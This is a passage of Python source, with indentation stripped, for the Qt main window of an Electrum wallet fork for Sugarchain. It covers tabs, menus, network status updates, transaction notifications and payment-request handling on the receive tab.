tabs.addTab(self.create_history_tab(), read_QIcon("tab_history.png"), _('History'))
tabs.addTab(self.send_tab, read_QIcon("tab_send.png"), _('Send'))
tabs.addTab(self.receive_tab, read_QIcon("tab_receive.png"), _('Receive'))
def add_optional_tab(tabs, tab, icon, description, name):
tab.tab_icon = icon
tab.tab_description = description
tab.tab_pos = len(tabs)
tab.tab_name = name
if self.config.get('show_{}_tab'.format(name), False):
tabs.addTab(tab, icon, description.replace("&", ""))
add_optional_tab(tabs, self.addresses_tab, read_QIcon("tab_addresses.png"), _("&Addresses"), "addresses")
add_optional_tab(tabs, self.utxo_tab, read_QIcon("tab_coins.png"), _("Co&ins"), "utxo")
add_optional_tab(tabs, self.contacts_tab, read_QIcon("tab_contacts.png"), _("Con&tacts"), "contacts")
add_optional_tab(tabs, self.console_tab, read_QIcon("tab_console.png"), _("Con&sole"), "console")
tabs.setSizePolicy(QSizePolicy.Expanding, QSizePolicy.Expanding)
self.setCentralWidget(tabs)
if self.config.get("is_maximized"):
self.showMaximized()
self.setWindowIcon(read_QIcon("electrum.png"))
self.init_menubar()
wrtabs = weakref.proxy(tabs)
QShortcut(QKeySequence("Ctrl+W"), self, self.close)
QShortcut(QKeySequence("Ctrl+Q"), self, self.close)
QShortcut(QKeySequence("Ctrl+R"), self, self.update_wallet)
QShortcut(QKeySequence("F5"), self, self.update_wallet)
QShortcut(QKeySequence("Ctrl+PgUp"), self, lambda: wrtabs.setCurrentIndex((wrtabs.currentIndex() - 1)%wrtabs.count()))
QShortcut(QKeySequence("Ctrl+PgDown"), self, lambda: wrtabs.setCurrentIndex((wrtabs.currentIndex() + 1)%wrtabs.count()))
for i in range(wrtabs.count()):
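# Bind i by value via the default argument so each shortcut selects its own
# tab (a plain closure would capture the loop variable instead).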
QShortcut(QKeySequence("Alt+" + str(i + 1)), self, lambda i=i: wrtabs.setCurrentIndex(i))
self.payment_request_ok_signal.connect(self.payment_request_ok)
self.payment_request_error_signal.connect(self.payment_request_error)
self.history_list.setFocus(True)
# network callbacks
if self.network:
self.network_signal.connect(self.on_network_qt)
interests = ['wallet_updated', 'network_updated', 'blockchain_updated',
'new_transaction', 'status',
'banner', 'verified', 'fee', 'fee_histogram']
# To avoid leaking references to "self" that prevent the
# window from being GC-ed when closed, callbacks should be
# methods of this class only, and specifically not be
# partials, lambdas or methods of subobjects. Hence...
self.network.register_callback(self.on_network, interests)
# set initial message
self.console.showMessage(self.network.banner)
self.network.register_callback(self.on_quotes, ['on_quotes'])
self.network.register_callback(self.on_history, ['on_history'])
self.new_fx_quotes_signal.connect(self.on_fx_quotes)
self.new_fx_history_signal.connect(self.on_fx_history)
# update fee slider in case we missed the callback
self.fee_slider.update()
self.load_wallet(wallet)
gui_object.timer.timeout.connect(self.timer_actions)
self.fetch_alias()
# If the option hasn't been set yet
if config.get('check_updates') is None:
choice = self.question(title="Electrum - " + _("Enable update check"),
msg=_("For security reasons we advise that you always use the latest version of Electrum.") + " " +
_("Would you like to be notified when there is a newer version of Electrum available?"))
config.set_key('check_updates', bool(choice), save=True)
if config.get('check_updates', False):
# The references to both the thread and the window need to be stored somewhere
# to prevent GC from getting in our way.
def on_version_received(v):
if UpdateCheck.is_newer(v):
self.update_check_button.setText(_("Update to Electrum {} is available").format(v))
self.update_check_button.clicked.connect(lambda: self.show_update_check(v))
self.update_check_button.show()
self._update_check_thread = UpdateCheckThread(self)
self._update_check_thread.checked.connect(on_version_received)
self._update_check_thread.start()
def on_history(self, b):
self.wallet.clear_coin_price_cache()
self.new_fx_history_signal.emit()
def setup_exception_hook(self):
Exception_Hook(self)
def on_fx_history(self):
self.history_model.refresh('fx_history')
self.address_list.update()
def on_quotes(self, b):
self.new_fx_quotes_signal.emit()
def on_fx_quotes(self):
self.update_status()
# Refresh edits with the new rate
edit = self.fiat_send_e if self.fiat_send_e.is_last_edited else self.amount_e
edit.textEdited.emit(edit.text())
edit = self.fiat_receive_e if self.fiat_receive_e.is_last_edited else self.receive_amount_e
edit.textEdited.emit(edit.text())
# History tab needs updating if it used spot
if self.fx.history_used_spot:
self.history_model.refresh('fx_quotes')
self.address_list.update()
def toggle_tab(self, tab):
show = not self.config.get('show_{}_tab'.format(tab.tab_name), False)
self.config.set_key('show_{}_tab'.format(tab.tab_name), show)
item_text = (_("Hide {}") if show else _("Show {}")).format(tab.tab_description)
tab.menu_action.setText(item_text)
if show:
# Find out where to place the tab
index = len(self.tabs)
for i in range(len(self.tabs)):
try:
if tab.tab_pos < self.tabs.widget(i).tab_pos:
index = i
break
except AttributeError:
pass
self.tabs.insertTab(index, tab, tab.tab_icon, tab.tab_description.replace("&", ""))
else:
i = self.tabs.indexOf(tab)
self.tabs.removeTab(i)
def push_top_level_window(self, window):
'''Used for e.g. tx dialog box to ensure new dialogs are appropriately
parented. This used to be done by explicitly providing the parent
window, but that isn't something hardware wallet prompts know.'''
self.tl_windows.append(window)
def pop_top_level_window(self, window):
self.tl_windows.remove(window)
def top_level_window(self, test_func=None):
'''Do the right thing in the presence of tx dialog windows'''
override = self.tl_windows[-1] if self.tl_windows else None
if override and test_func and not test_func(override):
override = None # only override if ok for test_func
return self.top_level_window_recurse(override, test_func)
def diagnostic_name(self):
#return '{}:{}'.format(self.__class__.__name__, self.wallet.diagnostic_name())
return self.wallet.diagnostic_name()
def is_hidden(self):
return self.isMinimized() or self.isHidden()
def show_or_hide(self):
if self.is_hidden():
self.bring_to_top()
else:
self.hide()
def bring_to_top(self):
self.show()
self.raise_()
def on_error(self, exc_info):
e = exc_info[1]
if isinstance(e, UserCancelled):
pass
elif isinstance(e, UserFacingException):
self.show_error(str(e))
else:
try:
self.logger.error("on_error", exc_info=exc_info)
except OSError:
pass # see #4418
self.show_error(str(e))
def on_network(self, event, *args):
if event == 'wallet_updated':
wallet = args[0]
if wallet == self.wallet:
self.need_update.set()
elif event == 'network_updated':
self.gui_object.network_updated_signal_obj.network_updated_signal \
.emit(event, args)
self.network_signal.emit('status', None)
elif event == 'blockchain_updated':
# to update number of confirmations in history
self.need_update.set()
elif event == 'new_transaction':
wallet, tx = args
if wallet == self.wallet:
self.tx_notification_queue.put(tx)
elif event in ['status', 'banner', 'verified', 'fee', 'fee_histogram']:
# Handle in GUI thread
self.network_signal.emit(event, args)
else:
self.logger.info(f"unexpected network message: {event} {args}")
def on_network_qt(self, event, args=None):
# Handle a network message in the GUI thread
if event == 'status':
self.update_status()
elif event == 'banner':
self.console.showMessage(args[0])
elif event == 'verified':
wallet, tx_hash, tx_mined_status = args
if wallet == self.wallet:
self.history_model.update_tx_mined_status(tx_hash, tx_mined_status)
elif event == 'fee':
if self.config.is_dynfee():
self.fee_slider.update()
self.require_fee_update = True
elif event == 'fee_histogram':
if self.config.is_dynfee():
self.fee_slider.update()
self.require_fee_update = True
self.history_model.on_fee_histogram()
else:
self.logger.info(f"unexpected network_qt signal: {event} {args}")
def fetch_alias(self):
self.alias_info = None
alias = self.config.get('alias')
if alias:
alias = str(alias)
def f():
self.alias_info = self.contacts.resolve_openalias(alias)
self.alias_received_signal.emit()
t = threading.Thread(target=f)
t.daemon = True
t.start()
def close_wallet(self):
if self.wallet:
self.logger.info(f'close_wallet {self.wallet.storage.path}')
run_hook('close_wallet', self.wallet)
@profiler
def load_wallet(self, wallet):
wallet.thread = TaskThread(self, self.on_error)
self.update_recently_visited(wallet.storage.path)
self.need_update.set()
# Once the GUI has been initialized, check whether we want to announce something, since the callback may have been called before the GUI was initialized.
# update menus
self.seed_menu.setEnabled(self.wallet.has_seed())
self.update_lock_icon()
self.update_buttons_on_seed()
self.update_console()
self.clear_receive_tab()
self.request_list.update()
self.tabs.show()
self.init_geometry()
if self.config.get('hide_gui') and self.gui_object.tray.isVisible():
self.hide()
else:
self.show()
self.watching_only_changed()
run_hook('load_wallet', wallet, self)
try:
wallet.try_detecting_internal_addresses_corruption()
except InternalAddressCorruption as e:
self.show_error(str(e))
send_exception_to_crash_reporter(e)
def init_geometry(self):
winpos = self.wallet.storage.get("winpos-qt")
try:
screen = self.app.desktop().screenGeometry()
assert screen.contains(QRect(*winpos))
self.setGeometry(*winpos)
except:
self.logger.info("using default geometry")
self.setGeometry(100, 100, 840, 400)
def watching_only_changed(self):
name = "Electrum for Sugarchain Testnet" if constants.net.TESTNET else "Electrum for Sugarchain"
title = '%s %s - %s' % (name, ELECTRUM_VERSION,
self.wallet.basename())
extra = [self.wallet.storage.get('wallet_type', '?')]
if self.wallet.is_watching_only():
extra.append(_('watching only'))
title += ' [%s]'% ', '.join(extra)
self.setWindowTitle(title)
self.password_menu.setEnabled(self.wallet.may_have_password())
self.import_privkey_menu.setVisible(self.wallet.can_import_privkey())
self.import_address_menu.setVisible(self.wallet.can_import_address())
self.export_menu.setEnabled(self.wallet.can_export())
def warn_if_watching_only(self):
if self.wallet.is_watching_only():
msg = ' '.join([
_("This wallet is watching-only."),
_("This means you will not be able to spend Bitcoins with it."),
_("Make sure you own the seed phrase or the private keys, before you request Bitcoins to be sent to this wallet.")
])
self.show_warning(msg, title=_('Watch-only wallet'))
def warn_if_testnet(self):
if not constants.net.TESTNET:
return
# user might have opted out already
if self.config.get('dont_show_testnet_warning', False):
return
# only show once per process lifecycle
if getattr(self.gui_object, '_warned_testnet', False):
return
self.gui_object._warned_testnet = True
msg = ''.join([
_("You are in testnet mode."), ' ',
_("Testnet coins are worthless."), '\n',
_("Testnet is separate from the main Bitcoin network. It is used for testing.")
])
cb = QCheckBox(_("Don't show this again."))
cb_checked = False
def on_cb(x):
nonlocal cb_checked
cb_checked = x == Qt.Checked
cb.stateChanged.connect(on_cb)
self.show_warning(msg, title=_('Testnet'), checkbox=cb)
if cb_checked:
self.config.set_key('dont_show_testnet_warning', True)
def open_wallet(self):
try:
wallet_folder = self.get_wallet_folder()
except FileNotFoundError as e:
self.show_error(str(e))
return
filename, __ = QFileDialog.getOpenFileName(self, "Select your wallet file", wallet_folder)
if not filename:
return
self.gui_object.new_window(filename)
def backup_wallet(self):
path = self.wallet.storage.path
wallet_folder = os.path.dirname(path)
filename, __ = QFileDialog.getSaveFileName(self, _('Enter a filename for the copy of your wallet'), wallet_folder)
if not filename:
return
new_path = os.path.join(wallet_folder, filename)
if new_path != path:
try:
shutil.copy2(path, new_path)
self.show_message(_("A copy of your wallet file was created in")+" '%s'" % str(new_path), title=_("Wallet backup created"))
except BaseException as reason:
self.show_critical(_("Electrum was unable to copy your wallet file to the specified location.") + "\n" + str(reason), title=_("Unable to create backup"))
def update_recently_visited(self, filename):
recent = self.config.get('recently_open', [])
try:
sorted(recent)
except:
recent = []
if filename in recent:
recent.remove(filename)
recent.insert(0, filename)
recent = [path for path in recent if os.path.exists(path)]
recent = recent[:5]
self.config.set_key('recently_open', recent)
self.recently_visited_menu.clear()
for i, k in enumerate(sorted(recent)):
b = os.path.basename(k)
def loader(k):
return lambda: self.gui_object.new_window(k)
self.recently_visited_menu.addAction(b, loader(k)).setShortcut(QKeySequence("Ctrl+%d"%(i+1)))
self.recently_visited_menu.setEnabled(len(recent))
def get_wallet_folder(self):
return os.path.dirname(os.path.abspath(self.config.get_wallet_path()))
def new_wallet(self):
try:
wallet_folder = self.get_wallet_folder()
except FileNotFoundError as e:
self.show_error(str(e))
return
filename = get_new_wallet_name(wallet_folder)
full_path = os.path.join(wallet_folder, filename)
self.gui_object.start_new_window(full_path, None)
def init_menubar(self):
menubar = QMenuBar()
file_menu = menubar.addMenu(_("&File"))
self.recently_visited_menu = file_menu.addMenu(_("&Recently open"))
file_menu.addAction(_("&Open"), self.open_wallet).setShortcut(QKeySequence.Open)
file_menu.addAction(_("&New/Restore"), self.new_wallet).setShortcut(QKeySequence.New)
file_menu.addAction(_("&Save Copy"), self.backup_wallet).setShortcut(QKeySequence.SaveAs)
file_menu.addAction(_("Delete"), self.remove_wallet)
file_menu.addSeparator()
file_menu.addAction(_("&Quit"), self.close)
wallet_menu = menubar.addMenu(_("&Wallet"))
wallet_menu.addAction(_("&Information"), self.show_master_public_keys)
wallet_menu.addSeparator()
self.password_menu = wallet_menu.addAction(_("&Password"), self.change_password_dialog)
self.seed_menu = wallet_menu.addAction(_("&Seed"), self.show_seed_dialog)
self.private_keys_menu = wallet_menu.addMenu(_("&Private keys"))
self.private_keys_menu.addAction(_("&Sweep"), self.sweep_key_dialog)
self.import_privkey_menu = self.private_keys_menu.addAction(_("&Import"), self.do_import_privkey)
self.export_menu = self.private_keys_menu.addAction(_("&Export"), self.export_privkeys_dialog)
self.import_address_menu = wallet_menu.addAction(_("Import addresses"), self.import_addresses)
wallet_menu.addSeparator()
addresses_menu = wallet_menu.addMenu(_("&Addresses"))
addresses_menu.addAction(_("&Filter"), lambda: self.address_list.toggle_toolbar(self.config))
labels_menu = wallet_menu.addMenu(_("&Labels"))
labels_menu.addAction(_("&Import"), self.do_import_labels)
labels_menu.addAction(_("&Export"), self.do_export_labels)
history_menu = wallet_menu.addMenu(_("&History"))
history_menu.addAction(_("&Filter"), lambda: self.history_list.toggle_toolbar(self.config))
history_menu.addAction(_("&Summary"), self.history_list.show_summary)
history_menu.addAction(_("&Plot"), self.history_list.plot_history_dialog)
history_menu.addAction(_("&Export"), self.history_list.export_history_dialog)
contacts_menu = wallet_menu.addMenu(_("Contacts"))
contacts_menu.addAction(_("&New"), self.new_contact_dialog)
contacts_menu.addAction(_("Import"), lambda: self.contact_list.import_contacts())
contacts_menu.addAction(_("Export"), lambda: self.contact_list.export_contacts())
invoices_menu = wallet_menu.addMenu(_("Invoices"))
invoices_menu.addAction(_("Import"), lambda: self.invoice_list.import_invoices())
invoices_menu.addAction(_("Export"), lambda: self.invoice_list.export_invoices())
wallet_menu.addSeparator()
wallet_menu.addAction(_("Find"), self.toggle_search).setShortcut(QKeySequence("Ctrl+F"))
def add_toggle_action(view_menu, tab):
is_shown = self.config.get('show_{}_tab'.format(tab.tab_name), False)
item_name = (_("Hide") if is_shown else _("Show")) + " " + tab.tab_description
tab.menu_action = view_menu.addAction(item_name, lambda: self.toggle_tab(tab))
view_menu = menubar.addMenu(_("&View"))
add_toggle_action(view_menu, self.addresses_tab)
add_toggle_action(view_menu, self.utxo_tab)
add_toggle_action(view_menu, self.contacts_tab)
add_toggle_action(view_menu, self.console_tab)
tools_menu = menubar.addMenu(_("&Tools"))
# "Settings" / "Preferences" are reserved menu names on macOS; use this as a workaround.
tools_menu.addAction(_("Electrum preferences") if sys.platform == 'darwin' else _("Preferences"), self.settings_dialog)
tools_menu.addAction(_("&Network"), lambda: self.gui_object.show_network_dialog(self))
tools_menu.addAction(_("&Plugins"), self.plugins_dialog)
tools_menu.addSeparator()
tools_menu.addAction(_("&Sign/verify message"), self.sign_verify_message)
tools_menu.addAction(_("&Encrypt/decrypt message"), self.encrypt_message)
tools_menu.addSeparator()
paytomany_menu = tools_menu.addAction(_("&Pay to many"), self.paytomany)
raw_transaction_menu = tools_menu.addMenu(_("&Load transaction"))
raw_transaction_menu.addAction(_("&From file"), self.do_process_from_file)
raw_transaction_menu.addAction(_("&From text"), self.do_process_from_text)
raw_transaction_menu.addAction(_("&From the blockchain"), self.do_process_from_txid)
raw_transaction_menu.addAction(_("&From QR code"), self.read_tx_from_qrcode)
self.raw_transaction_menu = raw_transaction_menu
run_hook('init_menubar_tools', self, tools_menu)
help_menu = menubar.addMenu(_("&Help"))
help_menu.addAction(_("&About"), self.show_about)
help_menu.addAction(_("&Check for updates"), self.show_update_check)
help_menu.addAction(_("&Official website"), lambda: webopen("https://sugarchain.org"))
help_menu.addSeparator()
help_menu.addAction(_("&Documentation"), lambda: webopen("http://docs.electrum.org/")).setShortcut(QKeySequence.HelpContents)
help_menu.addAction(_("&Report Bug"), self.show_report_bug)
help_menu.addSeparator()
help_menu.addAction(_("&Donate to server"), self.donate_to_server)
self.setMenuBar(menubar)
def donate_to_server(self):
d = self.network.get_donation_address()
if d:
host = self.network.get_parameters().host
self.pay_to_URI('sugarchain:%s?message=donation for %s'%(d, host))
else:
self.show_error(_('No donation address for this server'))
def show_about(self):
QMessageBox.about(self, "Electrum-SUGAR",
(_("Version")+" %s" % ELECTRUM_VERSION + "\n\n" +
_("Electrum's focus is speed, with low resource usage and simplifying Bitcoin.") + " " +
_("You do not need to perform regular backups, because your wallet can be "
"recovered from a secret phrase that you can memorize or write on paper.") + " " +
_("Startup times are instant because it operates in conjunction with high-performance "
"servers that handle the most complicated parts of the Bitcoin system.") + "\n\n" +
_("Uses icons from the Icons8 icon pack (icons8.com).")))
def show_update_check(self, version=None):
self.gui_object._update_check = UpdateCheck(self, version)
def show_report_bug(self):
msg = ' '.join([
_("Please report any bugs as issues on github:<br/>"),
f'''<a href="{constants.GIT_REPO_ISSUES_URL}">{constants.GIT_REPO_ISSUES_URL}</a><br/><br/>''',
_("Before reporting a bug, upgrade to the most recent version of Electrum (latest release or git HEAD), and include the version number in your report."),
_("Try to explain not only what the bug is, but how it occurs.")
])
self.show_message(msg, title="Electrum for Sugarchain - " + _("Reporting Bugs"), rich_text=True)
def notify_transactions(self):
if self.tx_notification_queue.qsize() == 0:
return
if not self.wallet.up_to_date:
return # no notifications while syncing
now = time.time()
rate_limit = 20 # seconds
if self.tx_notification_last_time + rate_limit > now:
return
self.tx_notification_last_time = now
self.logger.info("Notifying GUI about new transactions")
txns = []
while True:
try:
txns.append(self.tx_notification_queue.get_nowait())
except queue.Empty:
break
# Combine the transactions if there are at least three
if len(txns) >= 3:
total_amount = 0
for tx in txns:
is_relevant, is_mine, v, fee = self.wallet.get_wallet_delta(tx)
if not is_relevant:
continue
total_amount += v
self.notify(_("{} new transactions: Total amount received in the new transactions {}")
.format(len(txns), self.format_amount_and_units(total_amount)))
else:
for tx in txns:
is_relevant, is_mine, v, fee = self.wallet.get_wallet_delta(tx)
if not is_relevant:
continue
self.notify(_("New transaction: {}").format(self.format_amount_and_units(v)))
def notify(self, message):
if self.tray:
try:
# this requires Qt 5.9
self.tray.showMessage("Electrum for Sugarchain", message, read_QIcon("electrum_dark_icon"), 20000)
except TypeError:
self.tray.showMessage("Electrum for Sugarchain", message, QSystemTrayIcon.Information, 20000)
# custom wrappers for getOpenFileName and getSaveFileName, that remember the path selected by the user
def getOpenFileName(self, title, filter = ""):
directory = self.config.get('io_dir', os.path.expanduser('~'))
fileName, __ = QFileDialog.getOpenFileName(self, title, directory, filter)
if fileName and directory != os.path.dirname(fileName):
self.config.set_key('io_dir', os.path.dirname(fileName), True)
return fileName
def getSaveFileName(self, title, filename, filter = ""):
directory = self.config.get('io_dir', os.path.expanduser('~'))
path = os.path.join( directory, filename )
fileName, __ = QFileDialog.getSaveFileName(self, title, path, filter)
if fileName and directory != os.path.dirname(fileName):
self.config.set_key('io_dir', os.path.dirname(fileName), True)
return fileName
def timer_actions(self):
# Note this runs in the GUI thread
if self.need_update.is_set():
self.need_update.clear()
self.update_wallet()
elif not self.wallet.up_to_date:
# this updates "synchronizing" progress
self.update_status()
# resolve aliases
# FIXME this is a blocking network call that has a timeout of 5 sec
self.payto_e.resolve()
# update fee
if self.require_fee_update:
self.do_update_fee()
self.require_fee_update = False
self.notify_transactions()
def format_amount(self, x, is_diff=False, whitespaces=False):
return format_satoshis(x, self.num_zeros, self.decimal_point, is_diff=is_diff, whitespaces=whitespaces)
def format_amount_and_units(self, amount):
text = self.format_amount(amount) + ' '+ self.base_unit()
x = self.fx.format_amount_and_units(amount) if self.fx else None
if text and x:
text += ' (%s)'%x
return text
def format_fee_rate(self, fee_rate):
# fee_rate is in sat/kB
return format_fee_satoshis(fee_rate/1000, num_zeros=self.num_zeros) + ' sat/byte'
def get_decimal_point(self):
return self.decimal_point
def base_unit(self):
return decimal_point_to_base_unit_name(self.decimal_point)
def connect_fields(self, window, btc_e, fiat_e, fee_e):
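# Keep a coin-amount edit and its fiat counterpart in sync: editing one recomputes
# the other from the current exchange rate. The 'follows' flag marks a field that is
# being updated programmatically, so the echo does not trigger another round-trip.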
def edit_changed(edit):
if edit.follows:
return
edit.setStyleSheet(ColorScheme.DEFAULT.as_stylesheet())
fiat_e.is_last_edited = (edit == fiat_e)
amount = edit.get_amount()
rate = self.fx.exchange_rate() if self.fx else Decimal('NaN')
if rate.is_nan() or amount is None:
if edit is fiat_e:
btc_e.setText("")
if fee_e:
fee_e.setText("")
else:
fiat_e.setText("")
else:
if edit is fiat_e:
btc_e.follows = True
btc_e.setAmount(int(amount / Decimal(rate) * COIN))
btc_e.setStyleSheet(ColorScheme.BLUE.as_stylesheet())
btc_e.follows = False
if fee_e:
window.update_fee()
else:
fiat_e.follows = True
fiat_e.setText(self.fx.ccy_amount_str(
amount * Decimal(rate) / COIN, False))
fiat_e.setStyleSheet(ColorScheme.BLUE.as_stylesheet())
fiat_e.follows = False
btc_e.follows = False
fiat_e.follows = False
fiat_e.textChanged.connect(partial(edit_changed, fiat_e))
btc_e.textChanged.connect(partial(edit_changed, btc_e))
fiat_e.is_last_edited = False
def update_status(self):
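# Refresh the balance label, tray tooltip and status-bar icon to reflect the current
# network state (offline / not connected / lagging / synchronizing) and wallet balance.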
if not self.wallet:
return
if self.network is None:
text = _("Offline")
icon = read_QIcon("status_disconnected.png")
elif self.network.is_connected():
server_height = self.network.get_server_height()
server_lag = self.network.get_local_height() - server_height
fork_str = "_fork" if len(self.network.get_blockchains())>1 else ""
# Server height can be 0 after switching to a new server
# until we get a headers subscription request response.
# Display the synchronizing message in that case.
if not self.wallet.up_to_date or server_height == 0:
num_sent, num_answered = self.wallet.get_history_sync_state_details()
text = ("{} ({}/{})"
.format(_("Synchronizing..."), num_answered, num_sent))
icon = read_QIcon("status_waiting.png")
elif server_lag > 1:
text = _("Server is lagging ({} blocks)").format(server_lag)
icon = read_QIcon("status_lagging%s.png"%fork_str)
else:
c, u, x = self.wallet.get_balance()
text = _("Balance" ) + ": %s "%(self.format_amount_and_units(c))
if u:
text += " [%s unconfirmed]"%(self.format_amount(u, is_diff=True).strip())
if x:
text += " [%s unmatured]"%(self.format_amount(x, is_diff=True).strip())
# append fiat balance and price
if self.fx.is_enabled():
text += self.fx.get_fiat_status_text(c + u + x,
self.base_unit(), self.get_decimal_point()) or ''
if not self.network.proxy:
icon = read_QIcon("status_connected%s.png"%fork_str)
else:
icon = read_QIcon("status_connected_proxy%s.png"%fork_str)
else:
if self.network.proxy:
text = "{} ({})".format(_("Not connected"), _("proxy enabled"))
else:
text = _("Not connected")
icon = read_QIcon("status_disconnected.png")
self.tray.setToolTip("%s (%s)" % (text, self.wallet.basename()))
self.balance_label.setText(text)
self.status_button.setIcon( icon )
def update_wallet(self):
self.update_status()
if self.wallet.up_to_date or not self.network or not self.network.is_connected():
self.update_tabs()
def update_tabs(self, wallet=None):
if wallet is None:
wallet = self.wallet
if wallet != self.wallet:
return
self.history_model.refresh('update_tabs')
self.request_list.update()
self.address_list.update()
self.utxo_list.update()
self.contact_list.update()
self.invoice_list.update()
self.update_completions()
def create_history_tab(self):
self.history_model = HistoryModel(self)
self.history_list = l = HistoryList(self, self.history_model)
self.history_model.set_view(self.history_list)
l.searchable_list = l
toolbar = l.create_toolbar(self.config)
toolbar_shown = self.config.get('show_toolbar_history', False)
l.show_toolbar(toolbar_shown)
return self.create_list_tab(l, toolbar)
def show_address(self, addr):
from . import address_dialog
d = address_dialog.AddressDialog(self, addr)
d.exec_()
def show_transaction(self, tx, tx_desc = None):
'''tx_desc is set only for txs created in the Send tab'''
show_transaction(tx, self, tx_desc)
def create_receive_tab(self):
# A 4-column grid layout. All the stretch is in the last column.
# The exchange rate plugin adds a fiat widget in column 2
self.receive_grid = grid = QGridLayout()
grid.setSpacing(8)
grid.setColumnStretch(3, 1)
self.receive_address_e = ButtonsLineEdit()
self.receive_address_e.addCopyButton(self.app)
self.receive_address_e.setReadOnly(True)
msg = _('Bitcoin address where the payment should be received. Note that each payment request uses a different Bitcoin address.')
self.receive_address_label = HelpLabel(_('Receiving address'), msg)
self.receive_address_e.textChanged.connect(self.update_receive_qr)
self.receive_address_e.textChanged.connect(self.update_receive_address_styling)
self.receive_address_e.setFocusPolicy(Qt.ClickFocus)
grid.addWidget(self.receive_address_label, 0, 0)
grid.addWidget(self.receive_address_e, 0, 1, 1, -1)
self.receive_message_e = QLineEdit()
grid.addWidget(QLabel(_('Description')), 1, 0)
grid.addWidget(self.receive_message_e, 1, 1, 1, -1)
self.receive_message_e.textChanged.connect(self.update_receive_qr)
self.receive_amount_e = BTCAmountEdit(self.get_decimal_point)
grid.addWidget(QLabel(_('Requested amount')), 2, 0)
grid.addWidget(self.receive_amount_e, 2, 1)
self.receive_amount_e.textChanged.connect(self.update_receive_qr)
self.fiat_receive_e = AmountEdit(self.fx.get_currency if self.fx else '')
if not self.fx or not self.fx.is_enabled():
self.fiat_receive_e.setVisible(False)
grid.addWidget(self.fiat_receive_e, 2, 2, Qt.AlignLeft)
self.connect_fields(self, self.receive_amount_e, self.fiat_receive_e, None)
self.expires_combo = QComboBox()
self.expires_combo.addItems([i[0] for i in expiration_values])
self.expires_combo.setCurrentIndex(3)
self.expires_combo.setFixedWidth(self.receive_amount_e.width())
msg = ' '.join([
_('Expiration date of your request.'),
_('This information is seen by the recipient if you send them a signed payment request.'),
_('Expired requests have to be deleted manually from your list, in order to free the corresponding Bitcoin addresses.'),
_('The bitcoin address never expires and will always be part of this electrum wallet.'),
])
grid.addWidget(HelpLabel(_('Request expires'), msg), 3, 0)
grid.addWidget(self.expires_combo, 3, 1)
self.expires_label = QLineEdit('')
self.expires_label.setReadOnly(True)
self.expires_label.setFocusPolicy(Qt.NoFocus)
self.expires_label.hide()
grid.addWidget(self.expires_label, 3, 1)
self.save_request_button = QPushButton(_('Save'))
self.save_request_button.clicked.connect(self.save_payment_request)
self.new_request_button = QPushButton(_('New'))
self.new_request_button.clicked.connect(self.new_payment_request)
self.receive_qr = QRCodeWidget(fixedSize=200)
self.receive_qr.mouseReleaseEvent = lambda x: self.toggle_qr_window()
self.receive_qr.enterEvent = lambda x: self.app.setOverrideCursor(QCursor(Qt.PointingHandCursor))
self.receive_qr.leaveEvent = lambda x: self.app.setOverrideCursor(QCursor(Qt.ArrowCursor))
self.receive_buttons = buttons = QHBoxLayout()
buttons.addStretch(1)
buttons.addWidget(self.save_request_button)
buttons.addWidget(self.new_request_button)
grid.addLayout(buttons, 4, 1, 1, 2)
self.receive_requests_label = QLabel(_('Requests'))
from .request_list import RequestList
self.request_list = RequestList(self)
# layout
vbox_g = QVBoxLayout()
vbox_g.addLayout(grid)
vbox_g.addStretch()
hbox = QHBoxLayout()
hbox.addLayout(vbox_g)
hbox.addWidget(self.receive_qr)
w = QWidget()
w.searchable_list = self.request_list
vbox = QVBoxLayout(w)
vbox.addLayout(hbox)
vbox.addStretch(1)
vbox.addWidget(self.receive_requests_label)
vbox.addWidget(self.request_list)
vbox.setStretchFactor(self.request_list, 1000)
return w
def delete_payment_request(self, addr):
self.wallet.remove_payment_request(addr, self.config)
self.request_list.update()
self.clear_receive_tab()
def get_request_URI(self, addr):
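# Build a BIP21-style payment URI for a stored receive request, appending the creation
# time, expiry and, when present, the request's signature ('name' plus base58-encoded
# 'sig') as extra query parameters. The exact scheme and encoding are delegated to
# util.create_bip21_uri; the result is roughly of the form
# "sugarchain:<address>?amount=...&message=...&time=...&exp=..." (illustrative only).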
req = self.wallet.receive_requests[addr]
message = self.wallet.labels.get(addr, '')
amount = req['amount']
extra_query_params = {}
if req.get('time'):
extra_query_params['time'] = str(int(req.get('time')))
if req.get('exp'):
extra_query_params['exp'] = str(int(req.get('exp')))
if req.get('name') and req.get('sig'):
sig = bfh(req.get('sig'))
sig = bitcoin.base_encode(sig, base=58)
extra_query_params['name'] = req['name']
extra_query_params['sig'] = sig
uri = util.create_bip21_uri(addr, amount, message, extra_query_params=extra_query_params)
return str(uri)
def sign_payment_request(self, addr):
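# If an alias is configured and it resolves to an address belonging to this wallet,
# sign the payment request with that address's key, prompting for the wallet password
# when the keystore is encrypted.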
alias = self.config.get('alias')
alias_privkey = None
if alias and self.alias_info:
alias_addr, alias_name, validated = self.alias_info
if alias_addr:
if self.wallet.is_mine(alias_addr):
msg = _('This payment request will be signed.') + '\n' + _('Please enter your password')
password = None
if self.wallet.has_keystore_encryption():
password = self.password_dialog(msg)
if not password:
return
try:
self.wallet.sign_payment_request(addr, alias, alias_addr, password)
except Exception as e:
self.show_error(str(e))
return
else:
return
def save_payment_request(self):
addr = str(self.receive_address_e.text())
amount = self.receive_amount_e.get_amount()
message = self.receive_message_e.text()
if not message and not amount:
self.show_error(_('No message or amount'))
return False
i = self.expires_combo.currentIndex()
expiration = list(map(lambda x: x[1], expiration_values))[i]
req = self.wallet.make_payment_request(addr, amount, message, expiration)
try:
self.wallet.add_payment_request(req, self.config)
except Exception as e:
self.logger.exception('Error adding payment request')
self.show_error(_('Error adding payment request') + ':\n' + str(e))
else:
self.sign_payment_request(addr)
self.save_request_button.setEnabled(False)
finally:
self.request_list.update()
self.address_list.update()
def view_and_paste(self, title, msg, data):
dialog = WindowModalDialog(self, title)
vbox = QVBoxLayout()
label = QLabel(msg)
label.setWordWrap(True)
vbox.addWidget(label)
pr_e = ShowQRTextEdit(text=data)
vbox.addWidget(pr_e)
vbox.addLayout(Buttons(CopyCloseButton(pr_e.text, self.app, dialog)))
dialog.setLayout(vbox)
dialog.exec_()
def export_payment_request(self, addr):
r = self.wallet.receive_requests.get(addr)
pr = paymentrequest.serialize_request(r).SerializeToString()
name = r['id'] + '.bip70'
fileName = self.getSaveFileName(_("Select where to save your payment request"), name, "*.bip70")
if fileName:
with open(fileName, "wb+") as f:
f.write(util.to_bytes(pr))
self.show_message(_("Request saved successfully"))
self.saved = True
def new_payment_request(self):
addr = self.wallet.get_unused_address()
if addr is None:
if not self.wallet.is_deterministic():
msg = [
